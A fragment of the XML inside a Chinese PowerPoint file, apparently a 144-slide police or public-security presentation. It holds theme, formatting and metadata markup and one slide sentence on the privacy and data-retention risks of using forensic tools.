                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>取证工具和技术的使用也许会无意地向分析人员或其他相关取证人员泄露敏感信息。同样，取证工具无意中捕获的敏感信息的长期存储可能会违反数据保留策略。策略也要解决网络监控、提醒活动被监控的告示等问题。</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自定义 3209">
      <a:dk1>
        <a:srgbClr val="C8A843"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="00BDC6"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="C276B8"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="8DC21F"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="080808"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FFFFFF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="080808"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="080808"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="080808"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="080808"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="080808"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="08080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none">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr sz="1200" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:spDef>
    <a:txDef>
      <a:spPr>
        <a:noFill/>
      </a:spPr>
      <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:lnSpc>
            <a:spcPct val="150000"/>
          </a:lnSpc>
          <a:defRPr sz="1600" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:latin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17621</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(16:9)</PresentationFormat>
  <Paragraphs>824</Paragraphs>
  <Slides>144</Slides>
  <Notes>144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144</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="150" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</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公安</dc:title>
  <dc:creator>第一PPT</dc:creator>
  <cp:keywords>www.1ppt.com</cp:keywords>
  <dc:description>www.1ppt.com</dc:description>
  <cp:lastModifiedBy>PC</cp:lastModifiedBy>
  <cp:revision>2290</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-06-06T07:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-07T01:50:49Z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